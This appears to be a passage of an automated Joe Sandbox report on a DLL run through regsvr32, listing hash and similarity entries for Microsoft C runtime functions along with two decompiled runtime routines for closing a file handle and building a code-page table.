                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                                                    • API String ID: 2123368286-3409824857
                                                                    • Opcode ID: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                                    • Instruction ID: aea6e50ad225ee654e5ba897f2371f9ab8692fab447ee5272478533351973a17
                                                                    • Opcode Fuzzy Hash: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
                                                                    • Instruction Fuzzy Hash: 69214C72A2D64286EB909F58E84476EB7E0F380394F605125E6CE47AE4CBBED444CF42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_
                                                                    • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                                                    • API String ID: 1901436342-3621827421
                                                                    • Opcode ID: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                                    • Instruction ID: b6da7cfe51097e189ae1413993ad3b1820e6f9d9ec5e09c8ec6feaf0c9b902cc
                                                                    • Opcode Fuzzy Hash: 582f87e7669c1111abee6c616077222c15a1b9b573b43815cbd7bd4630f6c99c
                                                                    • Instruction Fuzzy Hash: 6D210132918A8186E790DB64E8516AEB7E0F7C4780F614122E7CD83AB9DB7DD954CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                                                    • API String ID: 2123368286-2972513288
                                                                    • Opcode ID: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                                    • Instruction ID: 6381d33894c21e9a570bb340808ef8ba759c91e84b1c9252353dd9e19991e7ba
                                                                    • Opcode Fuzzy Hash: f8745b700fb78b44b2e658b57c518d69726f466f5def5af1cc34e5c73236fe3e
                                                                    • Instruction Fuzzy Hash: 64211A31E1D242CAE7E08F28EC44B6E72E1F344395F605536A6CA866B4D77EE944CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                                                    • API String ID: 2123368286-367560414
                                                                    • Opcode ID: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                                    • Instruction ID: a1605579a08129191013953cda15cb2ece86ed32ec4905bca1088ce11b277eda
                                                                    • Opcode Fuzzy Hash: b10b6c40919f833f94f1f9af6a6d465dd1a232ebc9f5396bdae7492d99103452
                                                                    • Instruction Fuzzy Hash: EB114931E0C64A89F7E08B14EC457BE62E0F750385F608525D2DD46AF9CBBEE4888F01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                                                    • API String ID: 2123368286-2992382544
                                                                    • Opcode ID: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                                    • Instruction ID: 6b038216fd5801b421c61b74e1935d340daef546a177eff3ea16a7a1b838ed42
                                                                    • Opcode Fuzzy Hash: 4e01e6c780b0bcb150885d639f6c4af62c750d2377cec983ef0e9e7992ea6864
                                                                    • Instruction Fuzzy Hash: EE112831A08A86D5E7F08B24EC547BE62D0F388355FA0862581DD826E5CF7ED184CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                                                    • API String ID: 2123368286-3532421942
                                                                    • Opcode ID: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                                    • Instruction ID: a908f33eec800d0b641dcce84a446a4f1bc570cb1104d1739574f535c1af449d
                                                                    • Opcode Fuzzy Hash: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                                    • Instruction Fuzzy Hash: 2D115771A2D6468AE7949B54E948B6E73E0F380344F605125F6DD43AA8C7BED508CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                                    • API String ID: 2123368286-152112980
                                                                    • Opcode ID: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                                    • Instruction ID: 92758ea50bb160a3fa02acdedbd4276cd578df270f1ec03c6948689f63d256e2
                                                                    • Opcode Fuzzy Hash: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                                    • Instruction Fuzzy Hash: B7110331A1CA83C9F7A09B54EC047AEB6E0F340345F604425D6C8466A4CBBEE8888B02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                                                    • API String ID: 433497747-929597301
                                                                    • Opcode ID: 659d91e782a8862001f0c3efa2abcda19efd609cd314a8a22f2ba95e8e412daa
                                                                    • Instruction ID: a509fa70e7a1a5ff7154c4a485401b757d9bccf253ee3a6eb315a1ba73516cba
                                                                    • Opcode Fuzzy Hash: 659d91e782a8862001f0c3efa2abcda19efd609cd314a8a22f2ba95e8e412daa
                                                                    • Instruction Fuzzy Hash: 25012D21A2C64282F3D09B65EC4473EA2E0F784B50F719275A9DE426F5CF3FE4018A01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                    • API String ID: 2123368286-3131718208
                                                                    • Opcode ID: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                                    • Instruction ID: 5c692777b4ebe1842fa8b4633668c7a74dcbf255a9000a4830a35d89f8dfec26
                                                                    • Opcode Fuzzy Hash: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                                    • Instruction Fuzzy Hash: 64113571E086469AF7A08B28ED047BE62E0F344708F608225A7EC076F5D77EE548CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                    • API String ID: 2123368286-1927795013
                                                                    • Opcode ID: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                                    • Instruction ID: 0384ac4a385dd8b2ed67f657b87bd2987707cc06f4fd1891b24df9f5e25f1ad6
                                                                    • Opcode Fuzzy Hash: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                                    • Instruction Fuzzy Hash: D7010832E0C646D6F7A08B68EC057AD66D0B380354F704225A69C066F9DB7EE585CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                                                    • API String ID: 2123368286-563024394
                                                                    • Opcode ID: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                                    • Instruction ID: fd38c362069ef75f6546e890191a2209ff1da2573c153e25103ddfba7490d183
                                                                    • Opcode Fuzzy Hash: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                                    • Instruction Fuzzy Hash: EA011A3190964A86EBA09F14EC417AE32E0F355328FA14226D29C466E4DB7FE545CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
                                                                    • API String ID: 2123368286-577066449
                                                                    • Opcode ID: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                                    • Instruction ID: 02d1b78a9e545c30370c255a3c9a69dd209a03738a12318584891449022be9b6
                                                                    • Opcode Fuzzy Hash: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                                    • Instruction Fuzzy Hash: 8F017831E0C64ACAF7E08B54EC847AD26E0F794394FB09535A6DD466F8CB7EE5448B01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 1646373207-1276376045
                                                                    • Opcode ID: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                                    • Instruction ID: 7d77de13c6c7ff31230b68e177806ee2c45e09dad43843c6dfa61805c8a48305
                                                                    • Opcode Fuzzy Hash: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                                    • Instruction Fuzzy Hash: 97F0AC32918A4282D674DB18F94836DB7F0F388348F644125D6CE42678DF3ED559CA04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 41%
                                                                    			E000007FE7FEF9D40C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
                                                                    				signed long long _v16;
                                                                    				long _v24;
                                                                    				void* _t57;
                                                                    				signed long long _t59;
                                                                    
                                                                    				_t57 = __rax;
                                                                    				_a8 = __ecx;
                                                                    				E000007FE7FEF9D3F900(_a8);
                                                                    				if (_t57 == 0xffffffff) goto 0xf9d40d05;
                                                                    				if (_a8 != 1) goto 0xf9d40cb3;
                                                                    				if (( *( *0xf9d4e560 + 0xb8) & 0x00000001) != 0) goto 0xf9d40ccc;
                                                                    				if (_a8 != 2) goto 0xf9d40cef;
                                                                    				_t59 =  *0xf9d4e560;
                                                                    				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0xf9d40cef;
                                                                    				E000007FE7FEF9D3F900(1);
                                                                    				_v16 = _t59;
                                                                    				E000007FE7FEF9D3F900(2);
                                                                    				if (_v16 == _t59) goto 0xf9d40d05;
                                                                    				E000007FE7FEF9D3F900(_a8);
                                                                    				if (CloseHandle(??) == 0) goto 0xf9d40d0f;
                                                                    				_v24 = 0;
                                                                    				goto 0xf9d40d19;
                                                                    				_v24 = GetLastError();
                                                                    				E000007FE7FEF9D3F7D0(_a8, _t59);
                                                                    				 *((char*)( *((intOrPtr*)(0xf9d4e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
                                                                    				if (_v24 == 0) goto 0xf9d40d60;
                                                                    				E000007FE7FEF9D2AA70(_v24,  *((intOrPtr*)(0xf9d4e560 + _t59 * 8)));
                                                                    				goto 0xf9d40d62;
                                                                    				return 0;
                                                                    			}







                                                                    0x7fef9d40c80
                                                                    0x7fef9d40c80
                                                                    0x7fef9d40c8c
                                                                    0x7fef9d40c95
                                                                    0x7fef9d40c9c
                                                                    0x7fef9d40cb1
                                                                    0x7fef9d40cb8
                                                                    0x7fef9d40cba
                                                                    0x7fef9d40cca
                                                                    0x7fef9d40cd1
                                                                    0x7fef9d40cd6
                                                                    0x7fef9d40ce0
                                                                    0x7fef9d40ced
                                                                    0x7fef9d40cf3
                                                                    0x7fef9d40d03
                                                                    0x7fef9d40d05
                                                                    0x7fef9d40d0d
                                                                    0x7fef9d40d15
                                                                    0x7fef9d40d1d
                                                                    0x7fef9d40d44
                                                                    0x7fef9d40d4e
                                                                    0x7fef9d40d54
                                                                    0x7fef9d40d5e
                                                                    0x7fef9d40d66

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                                                    • String ID:
                                                                    • API String ID: 1551955814-0
                                                                    • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                                    • Instruction ID: de0ed08be9decc95e7dd14c86c95eccfc4319969b2c7c8741dbc19f533f0ba9a
                                                                    • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                                    • Instruction Fuzzy Hash: 4A219F32A0C64686E7A49B28EC4133E72E1F781355F348235E6DD46AF9DB2EE845CF01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: FormatLocaleThread$DateTime
                                                                    • String ID:
                                                                    • API String ID: 3587784874-0
                                                                    • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                                    • Instruction ID: 0d03bf333fdb9b17262424d59d82d7c7719cce37cb4ba974854027563787c74d
                                                                    • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                                    • Instruction Fuzzy Hash: 3311E33160878086E3608F68F94025EB7E0F748BA4F648724EF9D47BA8CB3ED1418700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 23%
                                                                    			E000007FE7FEF9D2A5E0(long long __rcx, void* _a8) {
                                                                    				signed int _v24;
                                                                    				char _v42;
                                                                    				void* _v48;
                                                                    				signed int _v56;
                                                                    				char _v312;
                                                                    				signed char* _v328;
                                                                    				char _v584;
                                                                    				char _v840;
                                                                    				char _v1352;
                                                                    				char _v1384;
                                                                    				char _v1392;
                                                                    				intOrPtr _v1400;
                                                                    				long long _v1408;
                                                                    				long long _v1416;
                                                                    				signed long long _t206;
                                                                    				signed char* _t214;
                                                                    				signed long long _t223;
                                                                    				intOrPtr _t225;
                                                                    				intOrPtr _t226;
                                                                    				signed long long _t233;
                                                                    
                                                                    				_t224 = __rcx;
                                                                    				_a8 = __rcx;
                                                                    				_t206 =  *0xf9d4b018; // 0x6ec4cabc2720
                                                                    				_v24 = _t206 ^ _t233;
                                                                    				if (GetCPInfo(??, ??) == 0) goto 0xf9d2a906;
                                                                    				_v56 = 0;
                                                                    				goto 0xf9d2a63c;
                                                                    				_v56 = _v56 + 1;
                                                                    				if (_v56 - 0x100 >= 0) goto 0xf9d2a661;
                                                                    				 *((char*)(_t233 + _a8 + 0x470)) = _v56 & 0x000000ff;
                                                                    				goto 0xf9d2a62c;
                                                                    				_v312 = 0x20;
                                                                    				_v328 =  &_v42;
                                                                    				goto 0xf9d2a68f;
                                                                    				_v328 =  &(_v328[2]);
                                                                    				if (( *_v328 & 0x000000ff) == 0) goto 0xf9d2a6ea;
                                                                    				_v56 =  *_v328 & 0x000000ff;
                                                                    				goto 0xf9d2a6c2;
                                                                    				_v56 = _v56 + 1;
                                                                    				_t214 = _v328;
                                                                    				if (_v56 - ( *(_t214 + 1) & 0x000000ff) > 0) goto 0xf9d2a6e8;
                                                                    				 *((char*)(_t233 + _t214 + 0x470)) = 0x20;
                                                                    				goto 0xf9d2a6b2;
                                                                    				goto 0xf9d2a67b;
                                                                    				_v1392 = 0;
                                                                    				_v1400 =  *((intOrPtr*)(_a8 + 0xc));
                                                                    				_v1408 =  *((intOrPtr*)(_a8 + 4));
                                                                    				_v1416 =  &_v1352;
                                                                    				r9d = 0x100;
                                                                    				E000007FE7FEF9D2F4D0(1,  &_v1352, __rcx,  &_v312);
                                                                    				_v1384 = 0;
                                                                    				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                                    				_v1400 = 0x100;
                                                                    				_v1408 =  &_v840;
                                                                    				_v1416 = 0x100;
                                                                    				r8d = 0x100;
                                                                    				E000007FE7FEF9D2EF00( *((intOrPtr*)(_a8 + 0xc)), _a8, _t224,  &_v312);
                                                                    				_v1384 = 0;
                                                                    				_v1392 =  *((intOrPtr*)(_a8 + 4));
                                                                    				_v1400 = 0x100;
                                                                    				_v1408 =  &_v584;
                                                                    				_v1416 = 0x100;
                                                                    				r8d = 0x200;
                                                                    				_t223 = _a8;
                                                                    				E000007FE7FEF9D2EF00( *((intOrPtr*)(_t223 + 0xc)), _t223, _t224,  &_v312);
                                                                    				_v56 = 0;
                                                                    				_v56 = _v56 + 1;
                                                                    				if (_v56 - 0x100 >= 0) goto 0xf9d2a901;
                                                                    				if (( *(_t233 + 0x60 + _t223 * 2) & 1) == 0) goto 0xf9d2a879;
                                                                    				_t225 = _a8;
                                                                    				 *((char*)(_a8 + _t225 + 0x1c)) =  *(_t225 + _t223 + 0x1c) & 0x000000ff | 0x00000010;
                                                                    				 *((char*)(_a8 + _t225 + 0x11d)) =  *(_t233 + _t223 + 0x260) & 0x000000ff;
                                                                    				goto 0xf9d2a8fc;
                                                                    				if (( *(_t233 + 0x60 + _t223 * 2) & 2) == 0) goto 0xf9d2a8e5;
                                                                    				_t226 = _a8;
                                                                    				 *((char*)(_a8 + _t226 + 0x1c)) =  *(_t226 + _t223 + 0x1c) & 0x000000ff | 0x00000020;
                                                                    				 *((char*)(_a8 + _t226 + 0x11d)) =  *(_t233 + _t223 + 0x360) & 0x000000ff;
                                                                    				goto 0xf9d2a8fc;
                                                                    				 *((char*)(_a8 + _t223 + 0x11d)) = 0;
                                                                    				goto L1;
                                                                    				goto 0xf9d2aa20;
                                                                    				_v56 = 0;
                                                                    				_v56 = _v56 + 1;
                                                                    				_v56 = _v56 + 1;
                                                                    				if (_v56 - 0x100 >= 0) goto 0xf9d2aa20;
                                                                    				if (_v56 - 0x41 < 0) goto 0xf9d2a99c;
                                                                    				if (_v56 - 0x5a > 0) goto 0xf9d2a99c;
                                                                    				_v56 = _v56 + 1;
                                                                    				__rcx = _a8;
                                                                    				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000010;
